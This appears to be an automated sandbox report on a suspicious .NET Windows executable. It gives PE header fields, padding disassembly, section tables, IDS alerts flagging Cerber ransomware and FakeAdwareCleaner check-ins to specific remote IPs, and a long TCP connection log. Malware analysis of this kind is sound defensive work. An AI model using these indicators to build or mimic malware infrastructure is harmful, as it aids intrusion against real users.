                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..`.........."......F...........e... ........@.. ....................................`................................
                                                                                                                                                Icon Hash:00828e8e8686b000
                                                                                                                                                Entrypoint:0x4265de
                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                Digitally signed:false
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                Subsystem:windows gui
                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                Time Stamp:0x601F0E40 [Sat Feb 6 21:46:40 2021 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x265840x57.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x566.rsrc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                .text0x20000x245e40x24600False0.9729180090206185data7.966504223719695IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                .rsrc0x280000x5660x600False0.408203125data3.9657132211361437IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                .reloc0x2a0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                                                                RT_VERSION0x280a00x2dcdata
                                                                                                                                                RT_MANIFEST0x2837c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                DLLImport
                                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                192.168.2.593.107.12.05504068932023626 09/29/22-14:52:42.658471UDP2023626ET TROJAN Ransomware/Cerber Checkin M3 (15)550406893192.168.2.593.107.12.0
                                                                                                                                                192.168.2.5185.53.177.5349804802809804 09/29/22-14:52:51.312026TCP2809804ETPRO MALWARE FakeAdwareCleaner.A Checkin4980480192.168.2.5185.53.177.53
                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Sep 29, 2022 14:51:11.988789082 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:11.988852024 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:11.988929033 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.035234928 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.035270929 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.093158960 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.093261003 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.101125956 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.101159096 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.101790905 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.304342031 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.755193949 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.755254030 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.773750067 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.773880005 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.773961067 CEST44349700140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.773964882 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.774008989 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.782537937 CEST49700443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:12.810472965 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.810586929 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.810698986 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.811420918 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.811455011 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.867336988 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.867464066 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.872039080 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.872071981 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.872499943 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.874522924 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.874547958 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.900928020 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.903098106 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.903134108 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.903249025 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.903294086 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.903377056 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.906260967 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.906297922 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.906409979 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.906439066 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.918179035 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.918212891 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.918421984 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.918421984 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.918454885 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.920732975 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.920766115 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.920918941 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.920918941 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.920955896 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.922049046 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.922081947 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.922153950 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.922182083 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.922203064 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.923851967 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.923882961 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.923969984 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.924007893 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.924031973 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.932521105 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.932565928 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.932651997 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.932693958 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.932718992 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.933789015 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.933815002 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.933912039 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.933943987 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.933964014 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.934858084 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.934911966 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.934969902 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.934998989 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.935017109 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.936547995 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.936570883 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.936660051 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.936660051 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.936682940 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.937251091 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.937278986 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.937458992 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.937474966 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.938261032 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.938287020 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.938399076 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.938420057 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.939316988 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.939342976 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.939445019 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.939471960 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.940371037 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.940390110 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.940470934 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.940470934 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.940490961 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.947840929 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.947882891 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.947949886 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.948003054 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.948029041 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.948062897 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.948086023 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.948105097 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.948143959 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.948627949 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.948657990 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.948730946 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.948745012 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.948777914 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.948801041 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.949153900 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.949189901 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.949239969 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.949254036 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.949271917 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.949300051 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.949903011 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.949929953 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.949996948 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950011969 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950027943 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950067043 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950680971 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950720072 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950788975 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950803041 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950830936 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950870037 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950894117 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950895071 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950895071 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950908899 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.950953007 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.950989962 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.951796055 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.951822996 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.951920986 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.951945066 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.951960087 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.951992989 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.952533960 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.952559948 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.952620983 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.952636003 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.952667952 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.952704906 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.953130007 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953156948 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953238964 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.953255892 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953310013 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.953321934 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953341007 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953361034 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953423023 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.953438044 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.953447104 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953464985 CEST44349701185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:12.953497887 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.953535080 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.961519003 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:12.963901997 CEST49701443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.089229107 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.089298010 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.089406013 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.089894056 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.089917898 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.138771057 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.146694899 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.146747112 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.169771910 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.169938087 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.170047045 CEST44349702140.82.121.3192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.170222044 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.170222044 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.171763897 CEST49702443192.168.2.5140.82.121.3
                                                                                                                                                Sep 29, 2022 14:51:17.172939062 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.172981024 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.173082113 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.173512936 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.173530102 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.220110893 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.229039907 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.229073048 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.260369062 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.262626886 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.262655020 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.262764931 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.262790918 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.262903929 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.265748024 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.265777111 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.265940905 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.265959024 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.277252913 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.277293921 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.277381897 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.277410030 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.277437925 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.279779911 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.279803991 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.279890060 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.279910088 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.281146049 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.281174898 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.281239986 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.281250000 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.281279087 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.282978058 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.283018112 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.283112049 CEST49703443192.168.2.5185.199.108.133
                                                                                                                                                Sep 29, 2022 14:51:17.283122063 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.291265965 CEST44349703185.199.108.133192.168.2.5
                                                                                                                                                Sep 29, 2022 14:51:17.291299105 CEST44349703185.199.108.133192.168.2.5
